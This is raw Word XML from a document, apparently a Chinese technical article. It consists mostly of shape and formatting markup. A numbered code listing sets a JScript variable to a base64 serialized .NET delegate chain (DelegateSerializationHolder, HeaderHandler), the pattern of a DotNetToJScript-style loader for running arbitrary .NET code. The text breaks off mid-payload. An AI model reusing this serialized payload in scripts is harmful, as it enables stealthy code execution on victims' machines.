        <v:shape style="position:absolute;left:2670;top:13750;width:130;height:270" coordorigin="2670,13750" coordsize="130,270" path="m2680,13771l2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2680,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2681,13771,2682,13771,2682,13771,2682,13771,2682,13771,2682,13771,2682,13771,2683,13771,2683,13771,2683,13771,2683,13771,2684,13771,2684,13771,2684,13771,2685,13771,2685,13771,2685,13771,2686,13771,2686,13771,2686,13771,2687,13771,2687,13771,2688,13771,2688,13771,2689,13771,2689,13771,2690,13771,2690,13771,2691,13771,2692,13771,2692,13771,2693,13771,2694,13771,2694,13771,2695,13771,2696,13771,2697,13771,2697,13771,2698,13771,2699,13771,2700,13771,2701,13771,2702,13771,2703,13771,2704,13771,2705,13771,2706,13771,2707,13771,2708,13771,2709,13771,2710,13771,2712,13771,2713,13771,2714,13771,2715,13771,2717,13771,2718,13771,2720,13771,2721,13771,2723,13771,2724,13771,2726,13771,2727,13771,2729,13771,2731,13771,2732,13771,2734,13771,2736,13771,2738,13771,2740,13771,2741,13771,2743,13771,2745,13771,2747,13771,2749,13771,2752,13771,2754,13771,2756,13771,2758,13771,2760,13771,2763,13771,2765,13771,2768,13771,2770,13771,2773,13771,2775,13771,2778,13771,2780,13771,2783,13771,2786,13771,2789,13771,2792,13771,2794,13771,2797,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13771,2800,13772,2800,13772,2800,13772,2800,13772,2800,13772,2800,13772,2800,13773,2800,13773,2800,13773,2800,13773,2800,13774,2800,13774,2800,13774,2800,13775,2800,13775,2800,13775,2800,13776,2800,13776,2800,13777,2800,13777,2800,13778,2800,13779,2800,13779,2800,13780,2800,13781,2800,13781,2800,13782,2800,13783,2800,13784,2800,13785,2800,13786,2800,13787,2800,13788,2800,13789,2800,13790,2800,13791,2800,13792,2800,13793,2800,13795,2800,13796,2800,13798,2800,13799,2800,13800,2800,13802,2800,13804,2800,13805,2800,13807,2800,13809,2800,13811,2800,13813,2800,13814,2800,13816,2800,13819,2800,13821,2800,13823,2800,13825,2800,13827,2800,13830,2800,13832,2800,13835,2800,13837,2800,13840,2800,13843,2800,13846,2800,13848,2800,13851,2800,13854,2800,13858,2800,13861,2800,13864,2800,13867,2800,13871,2800,13874,2800,13878,2800,13881,2800,13885,2800,13889,2800,13893,2800,13897,2800,13901,2800,13905,2800,13909,2800,13913,2800,13918,2800,13922,2800,13927,2800,13932,2800,13936,2800,13941,2800,13946,2800,13951,2800,13956,2800,13962,2800,13967,2800,13972,2800,13978,2800,13984,2800,13989,2800,13995,2800,14001,2800,14007,2800,14013,2800,14020,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2800,14026,2799,14026,2799,14026,2799,14026,2799,14026,2799,14026,2799,14026,2798,14026,2798,14026,2798,14026,2798,14026,2798,14026,2797,14026,2797,14026,2797,14026,2797,14026,2796,14026,2796,14026,2795,14026,2795,14026,2795,14026,2794,14026,2794,14026,2793,14026,2793,14026,2793,14026,2792,14026,2792,14026,2791,14026,2790,14026,2790,14026,2789,14026,2789,14026,2788,14026,2787,14026,2787,14026,2786,14026,2785,14026,2784,14026,2783,14026,2783,14026,2782,14026,2781,14026,2780,14026,2779,14026,2778,14026,2777,14026,2776,14026,2775,14026,2774,14026,2773,14026,2772,14026,2770,14026,2769,14026,2768,14026,2767,14026,2765,14026,2764,14026,2763,14026,2761,14026,2760,14026,2758,14026,2757,14026,2755,14026,2753,14026,2752,14026,2750,14026,2748,14026,2747,14026,2745,14026,2743,14026,2741,14026,2739,14026,2737,14026,2735,14026,2733,14026,2731,14026,2729,14026,2727,14026,2725,14026,2723,14026,2720,14026,2718,14026,2716,14026,2713,14026,2711,14026,2708,14026,2706,14026,2703,14026,2700,14026,2698,14026,2695,14026,2692,14026,2689,14026,2686,14026,2683,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14026,2680,14025,2680,14025,2680,14025,2680,14025,2680,14025,2680,14025,2680,14024,2680,14024,2680,14024,2680,14024,2680,14023,2680,14023,2680,14023,2680,14022,2680,14022,2680,14022,2680,14021,2680,14021,2680,14020,2680,14020,2680,14019,2680,14018,2680,14018,2680,14017,2680,14016,2680,14016,2680,14015,2680,14014,2680,14013,2680,14012,2680,14011,2680,14010,2680,14009,2680,14008,2680,14007,2680,14006,2680,14005,2680,14004,2680,14002,2680,14001,2680,13999,2680,13998,2680,13997,2680,13995,2680,13993,2680,13992,2680,13990,2680,13988,2680,13986,2680,13984,2680,13983,2680,13981,2680,13978,2680,13976,2680,13974,2680,13972,2680,13970,2680,13967,2680,13965,2680,13962,2680,13960,2680,13957,2680,13954,2680,13951,2680,13949,2680,13946,2680,13943,2680,13939,2680,13936,2680,13933,2680,13930,2680,13926,2680,13923,2680,13919,2680,13916,2680,13912,2680,13908,2680,13904,2680,13900,2680,13896,2680,13892,2680,13888,2680,13884,2680,13879,2680,13875,2680,13870,2680,13865,2680,13861,2680,13856,2680,13851,2680,13846,2680,13841,2680,13835,2680,13830,2680,13825,2680,13819,2680,13813,2680,13808,2680,13802,2680,13796,2680,13790,2680,13784,2680,13777,2680,13771e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:719.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14390" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14390;width:130;height:270" coordorigin="2670,14390" coordsize="130,270" path="m2680,14416l2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2680,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2681,14416,2682,14416,2682,14416,2682,14416,2682,14416,2682,14416,2682,14416,2683,14416,2683,14416,2683,14416,2683,14416,2684,14416,2684,14416,2684,14416,2685,14416,2685,14416,2685,14416,2686,14416,2686,14416,2686,14416,2687,14416,2687,14416,2688,14416,2688,14416,2689,14416,2689,14416,2690,14416,2690,14416,2691,14416,2692,14416,2692,14416,2693,14416,2694,14416,2694,14416,2695,14416,2696,14416,2697,14416,2697,14416,2698,14416,2699,14416,2700,14416,2701,14416,2702,14416,2703,14416,2704,14416,2705,14416,2706,14416,2707,14416,2708,14416,2709,14416,2710,14416,2712,14416,2713,14416,2714,14416,2715,14416,2717,14416,2718,14416,2720,14416,2721,14416,2723,14416,2724,14416,2726,14416,2727,14416,2729,14416,2731,14416,2732,14416,2734,14416,2736,14416,2738,14416,2740,14416,2741,14416,2743,14416,2745,14416,2747,14416,2749,14416,2752,14416,2754,14416,2756,14416,2758,14416,2760,14416,2763,14416,2765,14416,2768,14416,2770,14416,2773,14416,2775,14416,2778,14416,2780,14416,2783,14416,2786,14416,2789,14416,2792,14416,2794,14416,2797,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14416,2800,14417,2800,14417,2800,14417,2800,14417,2800,14417,2800,14417,2800,14417,2800,14417,2800,14417,2800,14418,2800,14418,2800,14418,2800,14418,2800,14419,2800,14419,2800,14419,2800,14420,2800,14420,2800,14420,2800,14421,2800,14421,2800,14422,2800,14422,2800,14423,2800,14423,2800,14424,2800,14425,2800,14425,2800,14426,2800,14427,2800,14427,2800,14428,2800,14429,2800,14430,2800,14431,2800,14432,2800,14433,2800,14434,2800,14435,2800,14436,2800,14438,2800,14439,2800,14440,2800,14441,2800,14443,2800,14444,2800,14446,2800,14447,2800,14449,2800,14451,2800,14452,2800,14454,2800,14456,2800,14458,2800,14460,2800,14462,2800,14464,2800,14466,2800,14468,2800,14470,2800,14473,2800,14475,2800,14478,2800,14480,2800,14483,2800,14485,2800,14488,2800,14491,2800,14494,2800,14497,2800,14500,2800,14503,2800,14506,2800,14509,2800,14513,2800,14516,2800,14519,2800,14523,2800,14527,2800,14530,2800,14534,2800,14538,2800,14542,2800,14546,2800,14550,2800,14554,2800,14559,2800,14563,2800,14568,2800,14572,2800,14577,2800,14582,2800,14587,2800,14592,2800,14597,2800,14602,2800,14607,2800,14612,2800,14618,2800,14623,2800,14629,2800,14635,2800,14641,2800,14647,2800,14653,2800,14659,2800,14665,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2800,14671,2799,14671,2799,14671,2799,14671,2799,14671,2799,14671,2799,14671,2798,14671,2798,14671,2798,14671,2798,14671,2798,14671,2797,14671,2797,14671,2797,14671,2797,14671,2796,14671,2796,14671,2795,14671,2795,14671,2795,14671,2794,14671,2794,14671,2793,14671,2793,14671,2793,14671,2792,14671,2792,14671,2791,14671,2790,14671,2790,14671,2789,14671,2789,14671,2788,14671,2787,14671,2787,14671,2786,14671,2785,14671,2784,14671,2783,14671,2783,14671,2782,14671,2781,14671,2780,14671,2779,14671,2778,14671,2777,14671,2776,14671,2775,14671,2774,14671,2773,14671,2772,14671,2770,14671,2769,14671,2768,14671,2767,14671,2765,14671,2764,14671,2763,14671,2761,14671,2760,14671,2758,14671,2757,14671,2755,14671,2753,14671,2752,14671,2750,14671,2748,14671,2747,14671,2745,14671,2743,14671,2741,14671,2739,14671,2737,14671,2735,14671,2733,14671,2731,14671,2729,14671,2727,14671,2725,14671,2723,14671,2720,14671,2718,14671,2716,14671,2713,14671,2711,14671,2708,14671,2706,14671,2703,14671,2700,14671,2698,14671,2695,14671,2692,14671,2689,14671,2686,14671,2683,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14671,2680,14670,2680,14670,2680,14670,2680,14670,2680,14670,2680,14669,2680,14669,2680,14669,2680,14668,2680,14668,2680,14668,2680,14667,2680,14667,2680,14666,2680,14666,2680,14665,2680,14665,2680,14664,2680,14664,2680,14663,2680,14662,2680,14662,2680,14661,2680,14660,2680,14659,2680,14658,2680,14658,2680,14657,2680,14656,2680,14655,2680,14654,2680,14652,2680,14651,2680,14650,2680,14649,2680,14648,2680,14646,2680,14645,2680,14643,2680,14642,2680,14640,2680,14639,2680,14637,2680,14635,2680,14634,2680,14632,2680,14630,2680,14628,2680,14626,2680,14624,2680,14622,2680,14619,2680,14617,2680,14615,2680,14612,2680,14610,2680,14608,2680,14605,2680,14602,2680,14600,2680,14597,2680,14594,2680,14591,2680,14588,2680,14585,2680,14582,2680,14578,2680,14575,2680,14572,2680,14568,2680,14565,2680,14561,2680,14557,2680,14553,2680,14550,2680,14546,2680,14542,2680,14537,2680,14533,2680,14529,2680,14524,2680,14520,2680,14515,2680,14511,2680,14506,2680,14501,2680,14496,2680,14491,2680,14486,2680,14481,2680,14475,2680,14470,2680,14464,2680,14459,2680,14453,2680,14447,2680,14441,2680,14435,2680,14429,2680,14423,2680,14416e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:751.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15030" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15030;width:130;height:270" coordorigin="2670,15030" coordsize="130,270" path="m2680,15047l2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2680,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2681,15047,2682,15047,2682,15047,2682,15047,2682,15047,2682,15047,2682,15047,2683,15047,2683,15047,2683,15047,2683,15047,2684,15047,2684,15047,2684,15047,2685,15047,2685,15047,2685,15047,2686,15047,2686,15047,2686,15047,2687,15047,2687,15047,2688,15047,2688,15047,2689,15047,2689,15047,2690,15047,2690,15047,2691,15047,2692,15047,2692,15047,2693,15047,2694,15047,2694,15047,2695,15047,2696,15047,2697,15047,2697,15047,2698,15047,2699,15047,2700,15047,2701,15047,2702,15047,2703,15047,2704,15047,2705,15047,2706,15047,2707,15047,2708,15047,2709,15047,2710,15047,2712,15047,2713,15047,2714,15047,2715,15047,2717,15047,2718,15047,2720,15047,2721,15047,2723,15047,2724,15047,2726,15047,2727,15047,2729,15047,2731,15047,2732,15047,2734,15047,2736,15047,2738,15047,2740,15047,2741,15047,2743,15047,2745,15047,2747,15047,2749,15047,2752,15047,2754,15047,2756,15047,2758,15047,2760,15047,2763,15047,2765,15047,2768,15047,2770,15047,2773,15047,2775,15047,2778,15047,2780,15047,2783,15047,2786,15047,2789,15047,2792,15047,2794,15047,2797,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15047,2800,15048,2800,15048,2800,15048,2800,15048,2800,15048,2800,15049,2800,15049,2800,15049,2800,15050,2800,15050,2800,15050,2800,15051,2800,15051,2800,15052,2800,15052,2800,15053,2800,15053,2800,15054,2800,15054,2800,15055,2800,15056,2800,15056,2800,15057,2800,15058,2800,15059,2800,15059,2800,15060,2800,15061,2800,15062,2800,15063,2800,15064,2800,15066,2800,15067,2800,15068,2800,15069,2800,15070,2800,15072,2800,15073,2800,15075,2800,15076,2800,15078,2800,15079,2800,15081,2800,15083,2800,15084,2800,15086,2800,15088,2800,15090,2800,15092,2800,15094,2800,15096,2800,15099,2800,15101,2800,15103,2800,15105,2800,15108,2800,15110,2800,15113,2800,15116,2800,15118,2800,15121,2800,15124,2800,15127,2800,15130,2800,15133,2800,15136,2800,15140,2800,15143,2800,15146,2800,15150,2800,15153,2800,15157,2800,15161,2800,15164,2800,15168,2800,15172,2800,15176,2800,15181,2800,15185,2800,15189,2800,15193,2800,15198,2800,15203,2800,15207,2800,15212,2800,15217,2800,15222,2800,15227,2800,15232,2800,15237,2800,15243,2800,15248,2800,15254,2800,15259,2800,15265,2800,15271,2800,15277,2800,15283,2800,15289,2800,15295,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2800,15302,2799,15302,2799,15302,2799,15302,2799,15302,2799,15302,2799,15302,2798,15302,2798,15302,2798,15302,2798,15302,2798,15302,2797,15302,2797,15302,2797,15302,2797,15302,2796,15302,2796,15302,2795,15302,2795,15302,2795,15302,2794,15302,2794,15302,2793,15302,2793,15302,2793,15302,2792,15302,2792,15302,2791,15302,2790,15302,2790,15302,2789,15302,2789,15302,2788,15302,2787,15302,2787,15302,2786,15302,2785,15302,2784,15302,2783,15302,2783,15302,2782,15302,2781,15302,2780,15302,2779,15302,2778,15302,2777,15302,2776,15302,2775,15302,2774,15302,2773,15302,2772,15302,2770,15302,2769,15302,2768,15302,2767,15302,2765,15302,2764,15302,2763,15302,2761,15302,2760,15302,2758,15302,2757,15302,2755,15302,2753,15302,2752,15302,2750,15302,2748,15302,2747,15302,2745,15302,2743,15302,2741,15302,2739,15302,2737,15302,2735,15302,2733,15302,2731,15302,2729,15302,2727,15302,2725,15302,2723,15302,2720,15302,2718,15302,2716,15302,2713,15302,2711,15302,2708,15302,2706,15302,2703,15302,2700,15302,2698,15302,2695,15302,2692,15302,2689,15302,2686,15302,2683,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15302,2680,15301,2680,15301,2680,15301,2680,15301,2680,15301,2680,15301,2680,15301,2680,15301,2680,15300,2680,15300,2680,15300,2680,15300,2680,15300,2680,15299,2680,15299,2680,15299,2680,15298,2680,15298,2680,15298,2680,15297,2680,15297,2680,15296,2680,15296,2680,15295,2680,15295,2680,15294,2680,15293,2680,15293,2680,15292,2680,15291,2680,15290,2680,15290,2680,15289,2680,15288,2680,15287,2680,15286,2680,15285,2680,15284,2680,15283,2680,15282,2680,15280,2680,15279,2680,15278,2680,15277,2680,15275,2680,15274,2680,15272,2680,15271,2680,15269,2680,15267,2680,15266,2680,15264,2680,15262,2680,15260,2680,15258,2680,15256,2680,15254,2680,15252,2680,15250,2680,15248,2680,15245,2680,15243,2680,15240,2680,15238,2680,15235,2680,15233,2680,15230,2680,15227,2680,15224,2680,15221,2680,15218,2680,15215,2680,15212,2680,15209,2680,15205,2680,15202,2680,15199,2680,15195,2680,15191,2680,15188,2680,15184,2680,15180,2680,15176,2680,15172,2680,15168,2680,15164,2680,15159,2680,15155,2680,15150,2680,15146,2680,15141,2680,15136,2680,15131,2680,15126,2680,15121,2680,15116,2680,15111,2680,15106,2680,15100,2680,15095,2680,15089,2680,15083,2680,15077,2680,15071,2680,15065,2680,15059,2680,15053,2680,15047e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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60" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137"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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>serialized_obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dGVTZXJpYWxpemF0aW9uSG9sZGVy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>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26</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"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2Vya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WFsaXph"</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27</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"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>25Ib2xk"</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28</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"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gAAAAkD"</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29</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"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0Rlb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GVnYXRl"</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30</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"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50Y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XJnZXRU"</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31</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"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2F0ZVNl"</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32</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"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lJlbW90"</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33</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"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i4wLjAu"</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34</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"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
